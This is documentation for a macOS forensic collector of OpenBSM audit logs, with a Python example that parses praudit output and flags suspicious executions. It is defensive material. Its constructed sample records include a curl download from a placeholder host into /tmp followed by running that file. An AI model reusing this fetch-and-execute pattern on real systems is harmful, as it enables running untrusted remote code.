Apple Audit Logs

Overview

Evidence: Apple Audit Logs
Description: Collect Apple Audit Logs
Category: System
Platform: macos
Short Name: audl
Is Parsed: Yes
Sent to Investigation Hub: Yes
Collect File(s): No

Background

Apple audit logs are the OpenBSM audit trails that auditd writes under /private/var/audit. They record security-relevant kernel events such as process executions (execve), authentication and session events, and file operations, and each record carries the subject's audit UID, effective and real user and group IDs, session and process IDs, and on modern macOS the code-signing identity of an executed binary. This makes the data essential for deep incident response and attribution. Note that Apple deprecated the OpenBSM audit subsystem in macOS 11 in favor of the Endpoint Security framework, and on newer releases auditd may not be enabled by default, so the trail directory can be empty or contain only older trails.

Data Collected

This collector gathers the structured records parsed from the Apple audit trails. One row is produced per audit record, with the fields below.

Apple Audit Logs Data

Field         Description                                                              Example
AuditLogFile  Audit trail file the record was read from (under /private/var/audit)     Example value
Version       BSM record version from the record header                                123
Event         Audit event name or type (e.g. an execve(2) or authentication event)     Example value
Modifier      Event modifier flags from the record header                              123
Time          Timestamp of the record                                                  2023-10-15 14:30:25+03:00
Msec          Millisecond part of the timestamp                                        123
AuditUID      Audit user ID: the identity the session logged in as, unchanged by       Example value
              su, sudo or setuid
UID           Effective user ID of the subject process                                 Example value
GID           Effective group ID of the subject process                                Example value
RUID          Real user ID of the subject process                                      Example value
RGID          Real group ID of the subject process                                     Example value
PID           Process ID of the subject                                                123
SID           Audit session ID                                                         123
TID           Terminal ID of the subject (port and remote address)                     Example value
Errval        Error value of the call (success or an errno description)                Example value
Retval        Return value of the call                                                 123
SignerType    Signer type from the code-signing identity token                         123
SigningID     Code-signing identifier of the executed binary                           Example value
TeamID        Apple Developer Team ID from the code signature                          Example value
CDHash        Code directory hash of the executed binary                               Example value
ExecArgs      Arguments passed to the exec call                                        Example value
FullPath      Full path of the object                                                  Example value
Path          Path of the file or object as recorded in the path token                 Example value

Collection Method

This collector copies the trail files from /private/var/audit/* and parses each of them with praudit -x -l (XML output, one record per line), recording the results into audit_log. Trails are named by their start and end time (start.end); the trail currently being written ends in .not_terminated and is also reachable through the current symlink. Its last record may be incomplete at copy time and will not parse, and a trail ending in .crash_recovery was left open by an unclean shutdown; both are still worth collecting.
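The parsing step above, as an added example that is not the collector's own code: it turns the one-record-per-line XML that praudit -x -l prints into the field set from the table, skips the XML wrapper lines and a truncated final record, and runs a small triage pass over successful execve(2) records. The two records in SAMPLE_TRAIL are constructed to match praudit's XML token names; the values, the choice to map the first path token to Path and the last to FullPath, the scratch-directory list and the helper names are assumptions.

```python
"""Parse `praudit -x -l` output into the audit_log field set and triage execs.

Added example, not the collector's own code. SAMPLE_TRAIL is constructed to
match the XML token names praudit(1) prints with -x -l; values, the
Path/FullPath split (first/last path token), TEMP_DIRS and helper names are
assumptions, not product behaviour.
"""
from datetime import datetime
from typing import Dict, List, Optional, Tuple
import xml.etree.ElementTree as ET

# Constructed sample: user alice runs curl under sudo (audit-uid alice, uid root),
# then executes the unsigned download from /tmp. The second record carries no
# identity token, which is assumed here for an unsigned binary.
SAMPLE_TRAIL = (
    "<?xml version='1.0' encoding='UTF-8'?>\n<audit>\n"
    '<record version="11" event="execve(2)" modifier="0" '
    'time="Sun Oct 15 14:30:25 2023" msec=" + 123 msec" >'
    "<exec_args><arg>/usr/bin/curl</arg><arg>-o</arg><arg>/tmp/x</arg>"
    "<arg>http://example.invalid/p</arg></exec_args>"
    "<path>/usr/bin/curl</path><path>/usr/bin/curl</path>"
    '<attribute mode="100755" uid="root" gid="wheel" fsid="16777220" nodeid="12345" device="0"/>'
    '<identity signer-type="1" signing-id="com.apple.curl" signing-id-truncated="no" '
    'team-id="" team-id-truncated="no" cdhash="0x0123456789abcdef0123456789abcdef01234567"/>'
    '<subject audit-uid="alice" uid="root" gid="wheel" ruid="root" rgid="wheel" '
    'pid="4242" sid="100005" tid="50331650 0.0.0.0"/>'
    '<return errval="success" retval="0"/></record>\n'
    '<record version="11" event="execve(2)" modifier="0" '
    'time="Sun Oct 15 14:31:02 2023" msec=" + 7 msec" >'
    "<exec_args><arg>/tmp/x</arg></exec_args><path>/tmp/x</path><path>/private/tmp/x</path>"
    '<attribute mode="100755" uid="alice" gid="staff" fsid="16777220" nodeid="67890" device="0"/>'
    '<subject audit-uid="alice" uid="alice" gid="staff" ruid="alice" rgid="staff" '
    'pid="4243" sid="100005" tid="50331650 0.0.0.0"/>'
    '<return errval="success" retval="0"/></record>\n'
    "</audit>\n"
)

# Assumed list of scratch locations a dropped payload is commonly run from.
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")


def _attr(el: Optional[ET.Element], name: str, default: str = "") -> str:
    """Attribute of an optional token element; missing token -> default."""
    return default if el is None else el.get(name, default)


def _int(value: str) -> int:
    """Integer from a praudit attribute such as '11', '-1' or ' + 123 msec'."""
    digits = "".join(ch for ch in value if ch.isdigit() or ch == "-")
    return int(digits) if digits.strip("-") else 0


def _time(raw: str) -> Optional[datetime]:
    """Header time as praudit prints it, e.g. 'Sun Oct 15 14:30:25 2023'.
    Single-digit days are padded with a second space, so collapse whitespace."""
    try:
        return datetime.strptime(" ".join(raw.split()), "%a %b %d %H:%M:%S %Y")
    except ValueError:
        return None


def parse_record(line: str, source_file: str) -> Optional[Dict[str, object]]:
    """One praudit -x -l line -> audit_log row, or None for wrapper/broken lines."""
    line = line.strip()
    if not line.startswith("<record"):
        return None  # <?xml ...?>, <audit> and </audit> wrapper lines
    try:
        rec = ET.fromstring(line)
    except ET.ParseError:
        return None  # truncated final record of a live (.not_terminated) trail
    subject, ret, ident = rec.find("subject"), rec.find("return"), rec.find("identity")
    paths = [p.text or "" for p in rec.findall("path")]
    return {
        "AuditLogFile": source_file,
        "Version": _int(rec.get("version", "0")),
        "Event": rec.get("event", ""),
        "Modifier": _int(rec.get("modifier", "0")),
        "Time": _time(rec.get("time", "")),
        "Msec": _int(rec.get("msec", "0")),
        "AuditUID": _attr(subject, "audit-uid"),
        "UID": _attr(subject, "uid"),
        "GID": _attr(subject, "gid"),
        "RUID": _attr(subject, "ruid"),
        "RGID": _attr(subject, "rgid"),
        "PID": _int(_attr(subject, "pid", "0")),
        "SID": _int(_attr(subject, "sid", "0")),
        "TID": _attr(subject, "tid"),
        "Errval": _attr(ret, "errval"),
        "Retval": _int(_attr(ret, "retval", "0")),
        "SignerType": _int(_attr(ident, "signer-type", "0")),
        "SigningID": _attr(ident, "signing-id"),
        "TeamID": _attr(ident, "team-id"),
        "CDHash": _attr(ident, "cdhash"),
        "ExecArgs": [a.text or "" for a in rec.findall("exec_args/arg")],
        "Path": paths[0] if paths else "",      # assumed: path as given to the call
        "FullPath": paths[-1] if paths else "",  # assumed: last (resolved) path token
    }


def parse_trail(text: str, source_file: str) -> List[Dict[str, object]]:
    """All parseable records from the text of one praudit -x -l run."""
    rows = (parse_record(line, source_file) for line in text.splitlines())
    return [r for r in rows if r is not None]


def suspicious_execs(records: List[Dict[str, object]]) -> List[Tuple[int, str, List[str]]]:
    """Successful execve(2) records worth a second look: run from a scratch
    directory, no code-signing identity, or the audit UID (login identity)
    differs from the effective UID, i.e. the exec happened after su/sudo/setuid."""
    hits = []
    for r in records:
        if r["Event"] != "execve(2)" or r["Errval"] != "success":
            continue
        reasons = []
        if str(r["FullPath"]).startswith(TEMP_DIRS):
            reasons.append("executed from a scratch directory")
        if not r["SigningID"]:
            reasons.append("no code-signing identity")
        if r["AuditUID"] and r["AuditUID"] != r["UID"]:
            reasons.append(f"audit uid {r['AuditUID']} running as uid {r['UID']}")
        if reasons:
            hits.append((int(r["PID"]), str(r["FullPath"]), reasons))
    return hits


if __name__ == "__main__":
    # On a host: praudit -x -l /private/var/audit/<trail> > trail.xml, then
    # pass that file's text to parse_trail instead of the constructed sample.
    for pid, path, why in suspicious_execs(parse_trail(SAMPLE_TRAIL, "20231015113000.not_terminated")):
        print(pid, path, "; ".join(why))
```

The audit UID check is the part worth keeping in a real pipeline: because the audit UID is fixed at login and survives privilege changes, a root-owned exec whose audit UID is an ordinary user is exactly the sudo/setuid transition an investigator needs to attribute.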

Forensic Value

This evidence is crucial for forensic investigations: each record is an authoritative, kernel-generated audit entry that ties an action to a process (PID, exec arguments, path) and to an identity (audit UID, effective and real UIDs, session ID), and, where the identity token is present, to the code-signing identity (signing ID, team ID, CD hash) of the binary that performed it. The audit UID in particular is set at login and survives su, sudo and setuid transitions, so actions taken as root can be traced back to the user who actually logged in.
